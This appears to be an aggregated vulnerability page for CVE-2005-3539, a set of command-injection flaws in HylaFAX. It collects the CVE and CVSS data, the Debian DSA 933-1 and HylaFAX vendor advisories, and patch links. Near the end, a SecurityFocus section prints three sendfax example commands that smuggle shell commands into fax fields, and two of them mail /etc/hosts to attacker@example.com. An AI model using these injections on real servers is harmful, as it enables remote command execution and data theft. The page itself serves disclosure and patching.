CVE-2005-3539
CVSS7.5
发布时间 :2005-12-31 00:00:00
修订时间 :2011-03-07 21:26:45
NMCOPS    

[原文]Multiple eval injection vulnerabilities in HylaFAX 4.2.3 and earlier allow remote attackers to execute arbitrary commands via (1) the notify script in HylaFAX 4.2.0 to 4.2.3 and (2) crafted CallID parameters to the faxrcvd script in HylaFAX 4.2.2 and 4.2.3.


[CNNVD]Hylafax多个脚本远程命令执行漏洞(CNNVD-200512-681)

        HylaFAX 4.2.3及更早版本中存在多个串演算指令注入漏洞,远程攻击者可以通过(1)在HylaFAX 4.2.0至4.2.3中的通知脚本和(2)传给HylaFAX 4.2.2和4.2.3中faxrcvd脚本的特制CallID参数来执行任意命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:hylafax:hylafax:4.2.1
cpe:/a:hylafax:hylafax:4.1.1
cpe:/a:hylafax:hylafax:4.2.2
cpe:/a:hylafax:hylafax:4.2.3
cpe:/a:hylafax:hylafax:4.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3539
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3539
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-681
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/16151
(PATCH)  BID  16151
http://www.gentoo.org/security/en/glsa/glsa-200601-03.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200601-03
http://secunia.com/advisories/18337
(VENDOR_ADVISORY)  SECUNIA  18337
http://secunia.com/advisories/18314
(VENDOR_ADVISORY)  SECUNIA  18314
http://www.vupen.com/english/advisories/2006/0072
(UNKNOWN)  VUPEN  ADV-2006-0072
http://www.securityfocus.com/archive/1/archive/1/420974/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060105 HylaFAX Security advisory - fixed in HylaFAX 4.2.4
http://www.hylafax.org/content/HylaFAX_4.2.4_release
(UNKNOWN)  CONFIRM  http://www.hylafax.org/content/HylaFAX_4.2.4_release
http://bugs.hylafax.org/bugzilla/show_bug.cgi?id=719
(UNKNOWN)  MISC  http://bugs.hylafax.org/bugzilla/show_bug.cgi?id=719
http://www.mandriva.com/security/advisories?name=MDKSA-2006:015
(UNKNOWN)  MANDRIVA  MDKSA-2006:015
http://www.debian.org/security/2005/dsa-933
(UNKNOWN)  DEBIAN  DSA-933
http://secunia.com/advisories/18489
(UNKNOWN)  SECUNIA  18489
http://secunia.com/advisories/18366
(UNKNOWN)  SECUNIA  18366

- 漏洞信息

Hylafax多个脚本远程命令执行漏洞
高危 输入验证
2005-12-31 00:00:00 2006-01-11 00:00:00
远程  
        HylaFAX 4.2.3及更早版本中存在多个串演算指令注入漏洞,远程攻击者可以通过(1)在HylaFAX 4.2.0至4.2.3中的通知脚本和(2)传给HylaFAX 4.2.2和4.2.3中faxrcvd脚本的特制CallID参数来执行任意命令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-4woody1_alpha.deb
        ftp://ftp.hylafax.org/source/hylafax-4.2.4.tar.gz
        http://wwwnew.mandriva.com/en/downloads/
        http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.2.1-5sarge3_amd64.deb
        http://security.debian.org/pool/updates/main/h/hylafax/hylafax-doc_4.2.1-5sarge3_all.deb

- 漏洞信息 (F42935)

Debian Linux Security Advisory 933-1 (PacketStormID:F42935)
2006-01-10 00:00:00
Debian  debian.org
advisory,arbitrary
linux,debian
CVE-2005-3539
[点击下载]

Debian Security Advisory DSA 933-1 - Patrice Fournier found that hylafax passes unsanitized user data in the notify script, allowing users with the ability to submit jobs to run arbitrary commands with the privileges of the hylafax server.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 933-1                     security@debian.org
http://www.debian.org/security/                              Michael Stone
January 9, 2006                         http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : hylafax
Vulnerability  : arbitrary command execution
Problem-Type   : local
Debian-specific: no
CVE ID         : CVE-2005-3539

Patrice Fournier found that hylafax passes unsanitized user data in the
notify script, allowing users with the ability to submit jobs to run
arbitrary commands  with the privileges of the hylafax server.

For the old stable distribution (woody) this problem has been fixed in
version 4.1.1-4woody1.

For the stable distribution (sarge) this problem has been fixed in
version 4.2.1-5sarge3.

For the unstable distribution the problem has been fixed in version
4.2.4-2.

We recommend that you upgrade your hylafax package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax_4.1.1-4woody1.dsc
      Size/MD5 checksum:      800 c9fd457c2782971a41c8328435b00ece
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax_4.1.1-4woody1.diff.gz
      Size/MD5 checksum:   116777 a2c212abd4a22134b673b3df345cb779
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax_4.1.1.orig.tar.gz
      Size/MD5 checksum:  1287689 1ed081750be70a800708699b7568e17e

  Architecture independent components:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-doc_4.1.1-4woody1_all.deb
      Size/MD5 checksum:   318384 bf2352b27b55b6a6b66acd8184864ed5

  Alpha architecture:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-4woody1_alpha.deb
      Size/MD5 checksum:   556394 4acfe414a92ca39dd08d945927134fde
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-4woody1_alpha.deb
      Size/MD5 checksum:  1362704 7c5d2805a86e35f77fbdc320608eae21

  ARM architecture:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-4woody1_arm.deb
      Size/MD5 checksum:   445742 bd7631c263e79ba1fa222616fab0814c
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-4woody1_arm.deb
      Size/MD5 checksum:  1096024 a5bccc072005832e21a63af6cd355d80

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-4woody1_i386.deb
      Size/MD5 checksum:   462478 a1b1d1ffb63fa002602fa817985c10d4
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-4woody1_i386.deb
      Size/MD5 checksum:  1132898 f7f7933a5c26c69048628d20c6d8c6e2

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-4woody1_ia64.deb
      Size/MD5 checksum:   615750 9dd3e91618a0b7ff630fc8e73472be90
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-4woody1_ia64.deb
      Size/MD5 checksum:  1491998 fcfa52b30bf30151ce3d9c9c283738b2

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-4woody1_hppa.deb
      Size/MD5 checksum:   501764 532a01a8b1c509fff8640a63743f27b0
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-4woody1_hppa.deb
      Size/MD5 checksum:  1231584 2d3a3a7072c00e4fc71bb48045aac459

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-4woody1_m68k.deb
      Size/MD5 checksum:   451356 52f1e0515d0dc3f88b25de500aa8916c
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-4woody1_m68k.deb
      Size/MD5 checksum:  1100320 294aa660f86c7090eb0092755a788009

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-4woody1_powerpc.deb
      Size/MD5 checksum:   450900 349b2498e9ca56c63e219911b79e2953
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-4woody1_powerpc.deb
      Size/MD5 checksum:  1104560 48b998cf768a2ff858c948e5892b32c4

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-4woody1_s390.deb
      Size/MD5 checksum:   441344 51762120b318ed4c800a12e28242b5fa
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-4woody1_s390.deb
      Size/MD5 checksum:  1087136 ba81545268b85fa2783814ca8322d3b3

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.1.1-4woody1_sparc.deb
      Size/MD5 checksum:   433674 4786a267f600ba71c8f9c80a1f371439
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.1.1-4woody1_sparc.deb
      Size/MD5 checksum:  1082890 6bdc5a6359c4b953f5127031af69cbe2


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax_4.2.1-5sarge3.dsc
      Size/MD5 checksum:      746 1202e740bcb10a01977c98f6967d2da4
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax_4.2.1-5sarge3.diff.gz
      Size/MD5 checksum:    51922 e7d0531c64d48a9907e1a9c73b882bff
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax_4.2.1.orig.tar.gz
      Size/MD5 checksum:  1412035 05430e41a279d0fff6d6e4b444440829

  Architecture independent components:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-doc_4.2.1-5sarge3_all.deb
      Size/MD5 checksum:   372578 70db2ce1b777e475cbe3335abc31a5a6

  Alpha architecture:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.2.1-5sarge3_alpha.deb
      Size/MD5 checksum:   373996 440dedf0a21a7ea99573ff9a0c8eb675
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.2.1-5sarge3_alpha.deb
      Size/MD5 checksum:   863606 cff4540597762579538d71e447b09f01

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.2.1-5sarge3_amd64.deb
      Size/MD5 checksum:   350894 a8040ccfde418e5cdf9f353f8b7471d9
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.2.1-5sarge3_amd64.deb
      Size/MD5 checksum:   801152 977bdc76fc44339599770227ba93befc

  ARM architecture:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.2.1-5sarge3_arm.deb
      Size/MD5 checksum:   342534 a79825720236fdafac2c6a7841b1fdec
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.2.1-5sarge3_arm.deb
      Size/MD5 checksum:   808884 10810889ed1c044fb1fec91af88184b2

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.2.1-5sarge3_i386.deb
      Size/MD5 checksum:   348172 0b3837a725542ab94fe7525beb54926d
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.2.1-5sarge3_i386.deb
      Size/MD5 checksum:   805786 05e61ba137faedbaf4a6d4b3faf0cce6

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.2.1-5sarge3_ia64.deb
      Size/MD5 checksum:   402530 a592a7397d1b75dc541584e3e10cbd23
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.2.1-5sarge3_ia64.deb
      Size/MD5 checksum:   924558 eb3701170b63c4ca617c93c74aa59f76

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.2.1-5sarge3_hppa.deb
      Size/MD5 checksum:   402386 7ec015549d9aa57e5a8e037deb6edb32
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.2.1-5sarge3_hppa.deb
      Size/MD5 checksum:   911520 948195eaaf686a5cffa3237df90d8504

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.2.1-5sarge3_m68k.deb
      Size/MD5 checksum:   345380 635f021fb40dbdd09c138608e64c309c
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.2.1-5sarge3_m68k.deb
      Size/MD5 checksum:   784438 3bc0f358363b448d3f8e72f95743a9fe

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.2.1-5sarge3_mips.deb
      Size/MD5 checksum:   352748 a65a3fcfffc4ec111fe4237a92734254
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.2.1-5sarge3_mips.deb
      Size/MD5 checksum:   836146 17146c51624cfc1f7c7eaac74c483f21

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.2.1-5sarge3_mipsel.deb
      Size/MD5 checksum:   350272 d5d512363681880db5e3d587021cab19
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.2.1-5sarge3_mipsel.deb
      Size/MD5 checksum:   831156 b06e0395c7b347093f2f9e1fe9673b91

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.2.1-5sarge3_powerpc.deb
      Size/MD5 checksum:   356672 778a434ea9e2e73d85ee8b7eaec4062c
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.2.1-5sarge3_powerpc.deb
      Size/MD5 checksum:   819686 4e82d570b0ffe822945814f90a5c175c

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-client_4.2.1-5sarge3_s390.deb
      Size/MD5 checksum:   339480 5afce0e8172e75b1b39d0086f69c5e0a
    http://security.debian.org/pool/updates/main/h/hylafax/hylafax-server_4.2.1-5sarge3_s390.deb
      Size/MD5 checksum:   767944 bc881199411dce80be644491b031af07

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)

iQCVAwUBQ8MmzA0hVr09l8FJAQKeqwQAruYHiI3B0QVio1gDn7DE7eUsQMs1vvCI
AVEXqjqyeWNhed9nJ8d0UjhlNvoyq2/WaN1pBdsZqJzEN5pzxJOaZtwZEWayss91
gvYJyH9Kg21sslU9RIOglIg/4K5EabKDi3GhqaqWutFiT0KTBLf77TuUidYYwTS5
NCWqBx5C0c4=
=IYBj
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息 (F42854)

HylaFAX-01042006.txt (PacketStormID:F42854)
2006-01-08 00:00:00
 
advisory,remote,arbitrary
CVE-2005-3538,CVE-2005-3539
[点击下载]

HylaFAX version 4.2.3 hfaxd will allow any password when compiled with PAM support disabled. Also, the HylaFAX notify script passes unsanitised user-supplied data to eval, allowing remote attackers to execute arbitrary commands. The data needs to be part of a submitted job and as such, attackers must have access to submit faxes to the server in order to exploit this vulnerability. HylaFAX versions 4.2.0 up to 4.2.3 are vulnerable.

I'm passing this on for Patrice Fournier who is not around today.
------------------------------------------------------------------------------

HylaFAX security advisory
4 Jan 2006

Subject:  HylaFAX hfaxd and notify/faxrcvd vulnerabilities

Introduction:

HylaFAX is a mature (est. 1991) enterprise-class open-source software
package for sending and receiving facsimiles as well as for sending
alpha-numeric pages.  It runs on a wide variety of UNIX-like platforms
including Linux, BSD (including Mac OS X), SunOS and Solaris, SCO, IRIX,
AIX, and HP-UX.  See http://www.hylafax.org


Problem Descriptions and Impact:

1. HylaFAX hfaxd will allow any password when compiled with PAM support
disabled.

Only HylaFAX version 4.2.3 is vulnerable. 

This vulnerability was mentioned by Dileep <dileep@networkgulf.com>
on the hylafax-users mailing list on December 12, was picked up and 
confirmed by Lee Horward and a fix was provided the same day by Todd
Lipcon. The fix was committed to CVS-HEAD on December 15.

This hfaxd PAM vulnerability has been assigned CVE-2005-3538

2. HylaFAX notify script passes unsanitised user-supplied data to eval,
allowing remote attackers to execute arbitrary commands. The data needs to be
part of a submitted job and as such, attackers must have access to submit faxes
to the server in order to exploit this vulnerability.

HylaFAX versions 4.2.0 up to 4.2.3 are vulnerable. Prior version used
a awk notify script that was not vulnerable. This vulnerability was
discovered and fixed by Patrice Fournier of iFAX Solutions, Inc.

HylaFAX faxrcvd script also passes unsanitised user-supplied data to eval,
allowing remote attackers to execute arbitrary commands. CallID 
(CIDName/CIDNumber) must be configured on the server and the attackers
must have access to submit non alphanumeric characters as CallID data
(which may not be possible for most configuration) in order to exploit
this vulnerability.

HylaFAX versions 4.2.2 and 4.2.3 are vulnerable. Prior version didn't support a
variable number of CallID parameters. These vulnerabilities were discovered and
fixed by Patrice Fournier of iFAX Solutions, Inc. The fix was committed to
CVS-HEAD on January 4.

These script vulnerabilities have been assigned CVE-2005-3539


Status:

HylaFAX.org has released HylaFAX version 4.2.4 which includes changes
to fix each of these problems.  All HylaFAX users are strongly
encouraged to upgrade.  The HylaFAX 4.2.4 source code is available at

   ftp://ftp.hylafax.org/source/hylafax-4.2.4.tar.gz

In the event that upgrading to 4.2.4 is not appropriate, the patches to
fix those vulnerabilities are available at the following bug reports:

   http://bugs.hylafax.org/bugzilla/show_bug.cgi?id=682
   http://bugs.hylafax.org/bugzilla/show_bug.cgi?id=719

If PAM support is NOT enabled and upgrading or patching is not possible,
firewalling techniques restricting access to port 4559 are strongly
encouraged. As the patches to faxrcvd and notify are simple changes to
shell scripts, you should apply those patches in either case.

No abuse of these vulnerabilities is known to HylaFAX development.

Thanks,

The vendor-sec mailing list was notified on 21st December, and HylaFAX
CVS-HEAD was updated on 15 December for the PAM-disabled login
vulnerability and on 4 January for the other two vulnerabilities.

Patrice Fournier
HylaFAX developer
    

- 漏洞信息

22246
HylaFAX notify Script Crafted Job Arbitrary Command Execution

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-01-04 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 4.2.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Hylafax Multiple Scripts Remote Command Execution Vulnerability
Input Validation Error 16151
Yes No
2006-01-05 12:00:00 2006-08-11 09:25:00
Patrice Fournier of iFAX Solutions, Inc. is credited with the discovery of these vulnerabilities.

- 受影响的程序版本

Mandriva Linux Mandrake 2006.0 x86_64
Mandriva Linux Mandrake 2006.0
Mandriva Linux Mandrake 10.2 x86_64
Mandriva Linux Mandrake 10.2
Mandriva Linux Mandrake 10.1 x86_64
Mandriva Linux Mandrake 10.1
Hylafax Hylafax 4.2.3
Hylafax Hylafax 4.2.2
Hylafax Hylafax 4.2.1
- Gentoo Linux
Hylafax Hylafax 4.2
Hylafax Hylafax 4.1.1
+ Debian Linux 3.0
Gentoo Linux
Hylafax Hylafax 4.2.4

- 不受影响的程序版本

Hylafax Hylafax 4.2.4

- 漏洞讨论

HylaFAX is vulnerable to multiple arbitrary command-execution vulnerabilities. This issue is due to a failure in the application to properly sanitize user-supplied input.

These vulnerabilities allow an attacker to execute arbitrary commands in the context of the affected application. Successful exploitation may facilitate a compromise of the underlying system.

- 漏洞利用

An exploit is not required.

Example commands to exploit these issues have been provided:

sendfax -d "411;number=\`cat /etc/hosts\`" /etc/hosts

sendfax -f "\`cat /etc/hosts|mail -s hosts attacker@example.com\` <attacker@example.com>" -d 411 /etc/hosts

sendfax -d "@411\";cat /etc/hosts|mail -s hosts attacker@example.com;" /etc/hosts

- 解决方案

Please see the referenced advisories for more information.

The vendor has released an updated version addressing this issue:


Hylafax Hylafax 4.1.1

Hylafax Hylafax 4.2

Hylafax Hylafax 4.2.1

Hylafax Hylafax 4.2.2

Hylafax Hylafax 4.2.3

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站